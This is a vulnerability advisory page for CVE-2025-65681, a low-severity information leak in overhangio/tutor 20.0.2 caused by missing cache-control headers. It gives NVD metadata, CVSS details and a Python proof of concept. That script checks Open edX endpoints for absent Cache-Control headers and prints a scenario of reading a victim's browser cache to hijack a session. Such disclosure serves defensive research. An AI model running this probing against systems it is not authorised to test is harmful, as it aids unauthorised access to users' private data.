Security Vulnerability Report
中文
CVE-2025-65681 CVSS 3.3 LOW

CVE-2025-65681

Published: 2025-11-26 19:15:50
Last Modified: 2025-12-30 15:38:15
Source: [email protected]

Description

An issue was discovered in Overhang.IO (tutor-open-edx) (overhangio/tutor) 20.0.2 allowing local unauthorized attackers to gain access to sensitive information due to the absence of proper cache-control HTTP headers and client-side session checks.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:edly:tutor:20.0.2:*:*:*:*:*:*:* - VULNERABLE
overhangio/tutor < 20.0.2
tutor-open-edx < 20.0.2
overhangio/tutor = 20.0.2 (受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65681 PoC - Information Disclosure via Missing Cache-Control Headers # Target: overhangio/tutor < 20.0.2 import requests import re from urllib.parse import urljoin def check_missing_cache_control(url): """ Check if the target application is missing Cache-Control headers """ print(f"[*] Checking {url} for missing Cache-Control headers...") # Target endpoints that should have Cache-Control headers sensitive_endpoints = [ "/api/user/v1/accounts/{username}", "/account/settings", "/api/enrollment/v1/enrollment", "/api/courseware/v1/courses/{course_id}" ] results = [] for endpoint in sensitive_endpoints: full_url = urljoin(url, endpoint) try: response = requests.get(full_url, timeout=10) cache_control = response.headers.get('Cache-Control') pragma = response.headers.get('Pragma') has_cache_issue = False issues = [] # Check for missing Cache-Control header if not cache_control: has_cache_issue = True issues.append("Missing Cache-Control header") elif 'no-store' not in cache_control.lower(): has_cache_issue = True issues.append("Cache-Control does not contain 'no-store'") # Check for missing Pragma: no-cache (for HTTP/1.0 compatibility) if not pragma: issues.append("Missing Pragma: no-cache header") result = { 'endpoint': endpoint, 'url': full_url, 'status_code': response.status_code, 'cache_control': cache_control, 'pragma': pragma, 'has_vulnerability': has_cache_issue, 'issues': issues } results.append(result) if has_cache_issue: print(f"[!] VULNERABLE: {endpoint}") print(f" Issues: {', '.join(issues)}") else: print(f"[+] SECURE: {endpoint}") except requests.RequestException as e: print(f"[-] Error checking {endpoint}: {str(e)}") return results def exploit_cache_poisoning(url, session_cookie): """ Attempt to exploit cached sensitive information Note: This requires local access to the victim's browser cache """ print("\n[*] Exploitation requires local browser cache access") print("[*] Attack scenario:") print(" 1. Attacker gains local access to victim's device") print(" 2. Attacker opens browser developer tools or cache directory") print(" 3. Attacker extracts cached API responses with sensitive data") print(" 4. Attacker uses cached session tokens for session hijacking") print("\n[!] This PoC demonstrates the vulnerability but actual exploitation") print("[!] requires access to the victim's browser cache storage.") if __name__ == "__main__": target_url = "https://your-tutor-instance.com" print("=" * 60) print("CVE-2025-65681 - Missing Cache-Control Headers PoC") print("Target: overhangio/tutor < 20.0.2") print("=" * 60) results = check_missing_cache_control(target_url) vulnerable_count = sum(1 for r in results if r['has_vulnerability']) print(f"\n[*] Summary: {vulnerable_count}/{len(results)} endpoints vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65681", "sourceIdentifier": "[email protected]", "published": "2025-11-26T19:15:49.590", "lastModified": "2025-12-30T15:38:14.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Overhang.IO (tutor-open-edx) (overhangio/tutor) 20.0.2 allowing local unauthorized attackers to gain access to sensitive information due to the absence of proper cache-control HTTP headers and client-side session checks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-384"}, {"lang": "en", "value": "CWE-524"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edly:tutor:20.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "8E45B355-FE47-48FE-BBA9-20C4970A693E"}]}]}], "references": [{"url": "https://docs.tutor.edly.io", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Rivek619/CVE-2025-65681", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/overhangio/tutor", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.